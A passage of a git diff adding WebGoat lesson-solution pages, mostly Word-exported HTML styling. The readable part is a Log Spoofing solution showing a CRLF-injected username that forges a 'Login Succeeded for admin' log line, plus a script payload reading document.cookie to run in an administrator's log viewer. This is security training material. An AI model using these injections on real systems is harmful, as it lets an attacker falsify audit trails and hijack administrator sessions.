+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.Heading3Char
+	{mso-style-name:"Heading 3 Char";
+	mso-style-noshow:yes;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 3";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Times New Roman","serif";
+	mso-ascii-font-family:"Times New Roman";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Times New Roman";
+	mso-bidi-font-family:Arial;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Log Spoofing. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+teaches attempts to fool the human eye. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> The attack
+is based on fooling the human eye in log files. An attacker can erase his
+traces from the logs using this attack. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->The
+grey area below represents what is going to be logged in the web server's log
+file.<br>
+Your goal is to make it like a username &quot;admin&quot; has succeeded into
+logging in.<br>
+Elevate your attack by adding a script to the log file. <!-- Stop Instructions --><span
+style='mso-spacerun:yes'> </span><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_135" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/LogSpoofing_files/image007.jpg" v:shapes="Picture_x0020_135"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Log Spoofing</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution: <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>This lesson accepts any input for a username and appends the information
+to the log file.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>Enter for username the text: smith Login Succeeded for username admin<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_136"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/LogSpoofing_files/image008.jpg" v:shapes="Picture_x0020_136"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Log spoof with long text</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>The text is added to the same line, not a new line. But any input is
+allowed.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>In this way you can inject carriage return (%0d) and line feed (%0a) to
+the application.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>Fill out the following text for the username: Smith%0d%0aLogin Succeeded
+for username: admin<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_137"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/LogSpoofing_files/image009.jpg" v:shapes="Picture_x0020_137"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>An attacker
+can use this attack to add malicious JavaScript to the log file, which will be
+viewed by the administrator using a browser. What happens when you inject admin
+&lt;script&gt;alert(document.cookie)&lt;/script&gt; for the username?<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/Thumbs.db b/main/project/WebContent/lesson_solutions/LogSpoofing_files/Thumbs.db
new file mode 100644
index 000000000..c8864bbfb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/Thumbs.db differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/LogSpoofing_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/LogSpoofing_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/filelist.xml b/main/project/WebContent/lesson_solutions/LogSpoofing_files/filelist.xml
new file mode 100644
index 000000000..66f2f27d6
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/LogSpoofing_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../LogSpoofing.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image007.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/image001.png b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image001.png
new file mode 100644
index 000000000..59ffaca93
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/image003.png b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image003.png
new file mode 100644
index 000000000..100684c5f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/image005.png b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image005.png
new file mode 100644
index 000000000..0174b03b0
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/image007.jpg b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image007.jpg
new file mode 100644
index 000000000..50abf182f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image007.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/image008.jpg b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image008.jpg
new file mode 100644
index 000000000..afd0c3eb3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/image009.jpg b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image009.jpg
new file mode 100644
index 000000000..259e28f16
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing_files/themedata.thmx b/main/project/WebContent/lesson_solutions/LogSpoofing_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/LogSpoofing_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl.html b/main/project/WebContent/lesson_solutions/PathBasedAccessControl.html
new file mode 100644
index 000000000..70661cf1e
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/PathBasedAccessControl.html
@@ -0,0 +1,650 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>22</o:TotalTime>
+  <o:Created>2007-07-11T10:47:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:32:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>121</o:Words>
+  <o:Characters>693</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>5</o:Lines>
+  <o:Paragraphs>1</o:Paragraphs>
+  <o:CharactersWithSpaces>813</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
